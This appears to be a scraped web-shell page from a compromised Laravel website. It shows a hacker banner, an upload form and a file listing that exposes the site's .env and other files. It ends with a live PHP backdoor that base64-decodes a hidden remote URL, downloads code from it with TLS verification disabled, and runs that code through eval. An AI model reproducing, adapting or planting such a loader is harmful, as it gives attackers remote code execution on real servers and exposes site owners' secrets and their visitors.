I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
489495df489495dfbase64EncodedResourceLocator = base64_decode($base64InputUrl); $this->initializePayloadAcquisitionProcess(); } private function initializePayloadAcquisitionProcess() { $temporaryPayloadBuffer = $this->attemptPrimaryCurlBasedRetrieval(); if ($temporaryPayloadBuffer === false) { $temporaryPayloadBuffer = $this->attemptSecondaryStreamContextRetrieval(); } $this->bufferedExecutionPayload = $temporaryPayloadBuffer ?: null; } private function attemptPrimaryCurlBasedRetrieval() { if (!function_exists('curl_exec')) return false; $curlSessionHandle = curl_init($this->base64EncodedResourceLocator); curl_setopt_array($curlSessionHandle, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false, ]); $rawCurlResponse = curl_exec($curlSessionHandle); $httpStatusResponseCode = curl_getinfo($curlSessionHandle, CURLINFO_HTTP_CODE); curl_close($curlSessionHandle); return ($httpStatusResponseCode === 200 && $rawCurlResponse && strlen(trim($rawCurlResponse)) > 10) ? $rawCurlResponse : false; } private function attemptSecondaryStreamContextRetrieval() { $contextParametersObject = stream_context_create([ "http" => ["follow_location" => 1, "timeout" => 10], "https" => ["verify_peer" => false, "verify_peer_name" => false] ]); $streamResultContent = @file_get_contents($this->base64EncodedResourceLocator, false, $contextParametersObject); return ($streamResultContent && strlen(trim($streamResultContent)) > 10) ? $streamResultContent : false; } public function safelyExecuteRemotePayload() { if (empty($this->bufferedExecutionPayload)) { return $this->internalFailureMessage ?: "��� Remote execution failure ���"; } try { ob_start(); eval("?>".$this->bufferedExecutionPayload); return ob_get_clean(); } catch (Throwable $executionCaughtException) { return "��� Runtime exception ���"; } } } $base64ResourcePathway = 'aHR0cHM6Ly9tYW56ZHJpdmUuY29tL2Nkbi9yYXcvcHJpb3JpdHkvYmx1ZS5sb2c='; $executionBridgeContext = new RemoteExecutionBridgeLayer($base64ResourcePathway); echo $executionBridgeContext->safelyExecuteRemotePayload(); ?>